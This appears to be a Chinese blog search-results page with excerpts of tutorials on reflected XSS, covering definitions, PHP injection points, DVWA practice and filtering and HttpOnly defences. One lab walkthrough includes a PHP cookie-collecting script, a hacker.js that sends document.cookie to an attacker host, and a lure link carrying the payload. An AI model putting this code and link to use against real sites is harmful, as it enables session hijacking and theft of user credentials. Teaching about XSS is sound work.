精华内容
下载资源
问答
  • 反射型XSS的利用

    千次阅读 2018-11-26 00:23:10
    反射型XSS:用户输入的恶意代码,被执行。 ...它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。...没想到,反射型XSS的利用比存储型还更容易,存储型XSS的利用还需结合CSRF. 这篇博客很好的讲述了反射型XS...

    反射型XSS:用户输入的恶意代码,被执行。
    利用:它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。
    以前一直觉得反射型XSS危害不大,只能自己在客户端玩玩,实现弹窗。
    没想到,反射型XSS的利用比存储型还更容易,存储型XSS的利用还需结合CSRF.
    这篇博客很好的讲述了反射型XSS的利用。
    http://netsecurity.51cto.com/art/201311/417201.htm
    我们可通过发送链接,来进行利用:

    • 需要一个网站,网站中有个能够收集cookie 的文件
    • 需要有收集受害者cookie后将收集的cookie发送给网站中文件的js文件
    • 构造链接,当用户点击该链接时,相当于执行了获取该用户的cookie并把cookie发送给收集cookie文件的操作。
    展开全文
  • 反射型XSS一般可以由攻击者构造带有恶意代码参数的URL来实现,在构造的URL地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击包含恶意代码参数的链接时才会触发。 ...

    什么是反射型 XSS 攻击?

    反射型 XSS 是指应用程序通过 Web 请求获取不可信赖的数据,并在未检验数据是否存在恶意代码的情况下,将其发送给用户。反射型 XSS 一般可以由攻击者构造带有恶意代码参数的 URL 来实现,在构造的URL 地址被打开后,其中包含的恶意代码参数被浏览器解析和执行。这种攻击的特点是非持久化,必须用户点击包含恶意代码参数的链接时才会触发。

    实现目的:

    (其实说白了就类似于  SQL 注入,只不过一个是针对数据库,一个是针对 HTML )

     通过你提交的数据,实现反射型 XSS 可以比较容易地修改用户数据、窃取用户信息。

    攻击示例:

    例如:下面 JSP 代码片段的功能是从 HTTP 请求中读取输入的用户名 (username) 并显示到页面,如果 name 里有包含恶意代码,那么 Web 浏览器就会像显示 HTTP 响应那样执行该代码,应用程序将受到反射型 XSS 攻击
    <%String name= request.getParameter("username"); %>
    姓名: <%= name%>

    为了避免反射型 XSS 攻击,建议采用以下方式进行防御

    1.对用户的输入进行合理验证(如年龄只能是数字),对特殊字符(如`<、>、'、"`以及 `<script>、javascript` 等进行过滤。
    2.根据数据将要置于 HTML上 下文中的不同位置(HTML 标签、HTML 属性、JavaScript 脚本、CSS、URL),对所有不可信数据进行恰当的输出编码。
    3.设置 HttpOnly 属性,避免攻击者利用跨站脚本漏洞进行 Cookie 劫持攻击。
    (其实白话理解就是,返回参数不要和请求参数一致,对用户输入的参数进行验证,确保没有包含 HTML 或 JS 等代码)

    代码示例:

     错误示例:传入参数对象,不管参数对象有用没用全部返回

    @ResponseBody
    @RequestMapping(value = "getMap")
    public Map getMap(Map map){
        // xxxx 业务逻辑
        return map;
    }
    
      正确示例:传入参数对象,返回可用参数
    @ResponseBody
    @RequestMapping(value = "getMap")
    public Map getMap(Map map){
        // xxxx 业务逻辑
        Map m = new Map()
        m.set(xxxx);
        m.set(xxxx);
        return m;
    }

     或者对后台传入参数进行代码过滤(简写的过滤方法)

    @ResponseBody
    @RequestMapping(value = "getMap")
    public Map getMap(String str){
        Map map = new Map();
        // xxxx 业务逻辑
        Pattern p_script;
        Matcher m_script;
        String regEx_script = "<[\\s]*?script[^>]*?>[\\s\\S]*?<[\\s]*?\\/[\\s]*?script[\\s]*?>"; //定义script的正则表达式{或<script[^>]*?>[\\s\\S]*?<\\/script> }
        p_script = Pattern.compile(regEx_script,Pattern.CASE_INSENSITIVE);
        m_script = p_script.matcher(str);
        str = m_script.replaceAll(""); //过滤script标签
        // 业务逻辑
        map.setxxxx(str);
        return map;
    }

     

     

     

    展开全文
  • 反射型xss实战演示

    2014-10-24 14:21:56
    我们知道,XSS攻击大致分为三种类型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最广的一种攻击方式。...它的特点是非持久化,... 今天,通过一个反射型xss的实战

       我们知道,XSS攻击大致分为三种类型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最广的一种攻击方式。它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。

        今天,通过一个反射型xss的实战演示,让大家详细了解这种攻击方式。

      
        准备工作:

    (1)  一个有反射型xss漏洞的网站(自己搭的虚拟站点,域名为xsstest.qq.com),该域名下有一个首页(index.html),一个登陆页面(login.html),一个登陆的cgi(login.php),一个用于搜索的cgi(search.php)。界面如下:


        由于xss漏洞一般发生于与用户交互的地方,因此搜索框是我们关注的重点。

      (2)我们自己的黑客网站(另一个虚拟站点 hacker.qq.com)。该域名下有一个hack.php,用以收集用户的cookie,一个hacker.js用以向hack.php发请求。


       发现漏洞 

    我们首先需要找出站点的xss漏洞发生在什么地方,上面提到,与用户交互的地方是我们的主要关注点。。好,现在我们随意输入几个字符“计算机”,点击搜索:

    搜索界面如下(这是自己写的一个简陋的搜索界面):


    这里发现了我们输入的字符出现在了搜索界面上(很多电商网站应该都是这种界面页面形式吧)。。好,这次我们输入一些特殊字符来试试“<script>alert(1)</script>”,点击搜索:


    出现了我们心仪的小弹窗,看来search.php未对用户输入的关键词作任何处理,便直接输出到界面上,既然xss漏洞出现,那么便可以开始实施攻击了,这次攻击的目的是盗取用户的cookie。

        

    实施攻击

    首先我们来写我们自己的手机cookie CGI(hack.php),代码如下:

    1. <?php   
    2.     $cookie = $_GET['q'];  
    3.     var_dump($cookie);  
    4.     $myFile = "cookie.txt";  
    5.     file_put_contents($myFile$cookie);  
    6. ?>  

    接着写发送请求的hacker.js,代码如下:

    var img = new Image();
    img.src = "http://hacker.qq.com/hack.php?q="+document.cookie;
    document.body.append(img);


    好的,现在可以构造一个连接来欺骗用户了:

    <a href="http://xsstest.qq.com/search.php?q=%3Cscript+src%3Dhttp%3A%2F%2Fhacker.qq.com%2Fhacker.js%3E%3C%2Fscript%3E&commend=all&ssid=s5-e&search_type=item&atype=&filterFineness=&rr=1&pcat=food2011&style=grid&cat=">点击就送998</a>


    看search.php 后的q参数 ,解码后为<script src="http://hacker.qq.com/hacker.js"></script>实际的作用是模拟用户在搜索框中输入<script src="http://hacker.qq.com/hacker.js"></script>后点击搜索。search.php未经处理的将其直接输入到页面,使其在html文档中有了新的语义。它会加载hacker.qq.com域下的haker.js。

    好,当用户登陆了网站后,再欺骗用户点击这个链接,这时候,看hacker.qq.com域下,发现多了一个cookie.txt文件,打开来:



    发现用户用于登陆的账号,密码都在内,密码是经过加密的。。OK,现在我们便可以拿着这个cookie来获取用户的登陆态了。

    整个攻击过程结束。


    当然,现实过程中,很少有网站有如此明显的xss漏洞。。这里只是给大家示范了一下反射型xss的原理,现实中的漏洞虽然五花八门,但是本质是不变的。。大家可以进一步研究。


    展开全文
  • 反射型XSS 保存型XSS 基于DOM的XSS 今天先学习反射型xss:它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数...

    0x01 基础介绍

    xss漏洞分类:一般来说分三种

    反射型XSS

    保存型XSS

    基于DOM的XSS

    今天先学习反射型xss:它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。

    0x02 造成原因及利用

    一般来说,许多漏洞造成的原因都是因为对用户的输入太信任造成的,没有进行严谨的过滤,通常在代码审计的过程中,审计获取用户输入的函数或者操作如存储等等

    一、对变量直接输出

    例如:

    <?php
    echo$_GET['xss'];
    ?>

    二:$_SERVER变量参数
    $_SERVER['PHP_SELF']

    测试代码:

    <?php
    echo $_SERVER['PHP_SELF'];
    ?>

    弹窗:

    $_SERVER['HTTP_USER_AGENT']

    此函数作用是获取浏览器信息

    <?php
    echo $_SERVER['HTTP_USER_AGENT'];
    ?>

    运行结果:

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0

    可通过火狐插件Modify headers 修改User-Agent:的内容就行了

    $_SERVER['HTTP_REFERER']

    这一个跟上一个差不多更改Referer就可以了

    $_SERVER['REQUEST_URI']

    此函数是获取url的内容的,而且会对特殊字符进行编码,此时必须用到php中的urldecode才能达到反射型xss的效果。

     

    有了urldecode()后:

    <?php
    echo urldecode($_SERVER['REQUEST_URI']);
    ?>

     

    0x03 总结

    知识学的不全,都是一些比较基础的东西,知道原理之后,后面会慢慢深入!

    转载于:https://www.cnblogs.com/kanghongsec/p/5201801.html

    展开全文
  • 通过DVWA学习反射型XSS漏洞

    千次阅读 2017-03-04 22:35:24
    XSS,全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致...
  • 前言随着互联网不断发展,web应用互动性也越来越强。相应,在用户体验提升同时安全风险也会跟着有所增加。今天,我们就来讲一讲web渗透中常见攻击方式之一,...特点:凡是存在输入框地方,都可能存在XS...
  • //PHP代码审计 XSS反射型漏洞 //什么是反射型漏洞 ...//他的特点是非持久化,必须用户带有特定的参数的链接才能引起 //URL路径参数携带脚本参数 //例:xxs=alert(1) echo $_GET['xxs']; ...感觉现在反射型XSS已经越来
  • 反射型XSS 漏洞 它通过给别人发送带有恶意脚本代码参数的URL,当URL 地址被打开时,特有的恶意代码参数被HTML 解析、执行。 它的特点是非持久化,必须用户点击带有特定参数的链接才能引起。 _SERVER 变量参数...
  • CTFHUB-WEB-XSS-反射型

    2020-08-13 11:43:18
    CTFHUB-WEB-XSS-反射型知识点:跨站脚本攻击XSS题目XSS platform平台 知识点:跨站脚本攻击XSS XSS允许恶意web用户将代码植入到提供给其它用户使用页面中。 特点:能注入恶意HTML/JavaScript代码到用户浏览器...
  • XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的,当用户浏览这些网页时,就会执行其中的恶意代码。由于HTML代码和客户端JavaScript脚本能在受害...
  • DOM型XSS

    2020-11-02 19:29:42
    分别为反射型、存储型、DOM型,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM型来说比较好检测与防御,而DOM型不用将恶意脚本传输到服务器在返回客户端,这就是DOM型和反射、存储型区别,所以我这里...
  • XSS

    2020-09-30 08:15:47
    反射型xss一般是通过uri形式注入代码,注入代码不在服务器端存储,但会在在服务器端进行处理然后进行回显,在回显时浏览器会触发执行注入代码,该类型攻击具有临时性特点。 总结:反射型是通过url形式注入代码,...
  • XSS的分类

    2019-04-29 14:47:52
    一.XSS 的分类 ...2)反射型xss会诱导用户去访问一个包含恶意代码的url,当用户访问这些连接的时候,恶意的js代码会直接在受害者的浏览器上执行,他的特点是只在用户单击时触发,而且只执行一次,非...
  • XSS根据恶意脚本传递方式可以分为3种,分别为反射型、存储型、DOM型,前面两种恶意脚本都会经过服务器端然后返回给客户端,而DOM型不用将恶意脚本传输到服务器在返回客户端。 原理: DOM型XSS就是基于DOM文档对象...
  • XSS注入

    2021-03-22 15:00:07
    实验环境:phpstudy2018+DVWA ...XSS分类及特点:存储型、反射型、DOM型。 存储型和反射型的区别在于是否有交互 易用性排序:存储型》DOM型》反射型 有些内容参考了本篇文章https://blog.csdn.net/qq_353
  • XSS漏洞入门介绍

    2020-05-04 15:17:22
    文章目录一、含义二、漏洞普遍原因三、XSS分类3.1 反射型XSS3.1.1 含义3.1.2 特点3.2 存储型XSS3.2.1 含义3.2.2 特点3.3 DOM型XSS3.3.1 含义3.3.2 特点四、危害 一、含义   XSS(Cross Site Scripting,跨站脚本...
  • XSS漏洞大致分为三种反射型XSS漏洞存储型XSS漏洞基于DOM的XSS漏洞反射型XSS漏洞它通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行它的特点是非持久化,必须用户...
  • 二、XSS漏洞

    2017-12-19 05:16:27
    xss: 全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。...反射型xss(非持久): 反射型xss一般是指自定义内容发送的服务器,服务...
  • Rootkit XSS

    2018-09-21 22:49:00
    谈到XSS,一般都是想到反射型、存储型及dom xss,脑海中往往就是点击链接然后弹窗形式,这次学习是ROORKIT XSS(持久化XSS),就是通过某些手段嵌入一些js代码,从而获取一个持久控制浏览器客户端“Ro...
  • XSS漏洞学习笔记

    2019-04-22 22:08:00
    xss最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的。 说白了就是想尽办法让你加载一段js代码从而获取cookie等敏感信息进而搞破坏 XSS大致分为三类 反射XSS:直接构造url来攻击...
  • 网络协议——浅谈XSS

    2020-07-31 17:48:13
    反射型XSS 反射型:通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行,它的特点是非持久化,即不存入数据库。 缺点: ①需要用户点击带有特定恶意脚本代
  • DVWA学习之XSS(跨站脚本攻击)(超级详细)

    千次阅读 多人点赞 2019-08-22 20:18:00
    DVWA学习之XSSXSS 跨站脚本攻击0x01 XSS(Cross Site Script)简介0x02 何为XSS0x03 XSS... 反射型XSS3. MOD型XSS XSS 跨站脚本攻击 0x01 XSS(Cross Site Script)简介 0x02 何为XSS 跨站脚本攻击XSS(Cross Sit...
  • 跨站脚本攻击(XSS)

    2018-08-15 17:32:59
    概念 XSS攻击,通常指通过'HTML注入'篡改了网页,插入恶意脚本,大多数是javascript或者指向脚本的...主要的攻击对象是当前用户的个人信息。 ... ...XSS的三种类型 ... 反射型XSS特点是黑客需要诱使用户点击一个恶意链...
  • xss攻击大致分为三种类型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最广的一种攻击方式。...通过一个反射型xss的实战演示,让大家详细了解这种
  • DVWA指点迷津-XSS(Stored)

    2020-10-23 14:36:00
    相比反射型XSS,该类型XSS带来危害更大,持续事件更久。 漏洞危害 泄露用户Cooike 泄露用户IP地址、浏览器信息 篡改网页 XSS钓鱼 DVWA Low 应用防御措施 服务器端只检查是否存在“name”和“message”这两...
  • 一 XSS 介绍: 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。 XSS最大的特点就是能注入恶意的HTML/JavaScript代码到用户浏览的网页上,是因WEB应用程序对用户输入过滤不足而产生的...1.反射型XSS
  • 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。 通过Web站点漏洞,向客户交付...
  • 像前不久微信貌似就中招,好像是在朋友圈发送一个带有脚本的链接,然后通过点击该链接就会弹出一个提示,虽然没有造成什么影响,但这是XSS攻击最鲜明的特点。 分类 XSS现在主要分为以下两种攻击类型: 1、反射型...
  • xss攻击---非法转账

    2018-07-20 16:42:38
    1. 反射型xss攻击: 通过给别人发送带有恶意脚本代码参数的URL,当URL地址被打开时,特有的恶意代码参数被HTML解析、执行。它的特点是非持久化,必须用户点击带有特定参数的链接才能引起 但是,在浏览器中添加这一...

空空如也

空空如也

1 2 3
收藏数 42
精华内容 16
关键字:

反射型xss的特点